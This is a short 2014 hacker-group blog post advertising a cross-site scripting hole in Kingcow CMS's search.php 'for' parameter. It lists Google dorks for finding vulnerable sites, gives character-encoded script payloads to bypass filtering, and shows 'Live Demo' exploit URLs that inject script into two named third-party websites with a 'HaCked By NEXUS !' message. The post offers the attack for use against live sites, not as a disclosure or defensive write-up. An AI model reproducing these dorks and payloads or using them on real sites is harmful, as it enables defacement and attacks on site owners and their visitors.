Kingcow CMS Cross Site Scripting ~ Backtrack Team

Kingcow CMS Cross Site Scripting

by Malik korrich ~ mardi 1 juillet 2014 Libellés : Kingcow CMS , newbie , NEXUS , Xss

Dorks:

inurl:"search.php?for="

intext:"Powered by Central"

* for parameter in search.php is VULNERABLE to XSS..

Exploits:

">&search_submit=Search

Or if you can't use normal script.. Change it from string to character:

">&search_submit=Search

These char "String.fromCharCode(72, 97, 67, 107, 101, 100, 32, 66, 121, 32, 78, 69, 88, 85, 83, 32, 33)" is "HaCked By NEXUS !" using Hack Bar of Firefox...

If you dont have that "Hack Bar" .. Download it from :

https://addons.mozilla.org/en-US/firefox/addon/hackbar/

Live Demo:

http://hdmixtapes.com/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083,%2032,%2033%29%29;%3C/script%3E&search_submit=Search

http://artnews.org/search.php?for=%22%3E%3Cscript%3Ealert%28String.fromCharCode%2872,%2097,%2067,%20107,%20101,%20100,%2032,%2066,%20121,%2032,%2078,%2069,%2088,%2085,%2083%29%29;%3C/script%3E&search_submit=Search

NEXUS

Kingcow CMS Cross Site Scripting

0 commentaires :

Enregistrer un commentaire

ads

Category

Total Pageviews

Kingcow CMS Cross Site Scripting

0 commentaires :

Enregistrer un commentaire

ads

Category

Follow us

Total Pageviews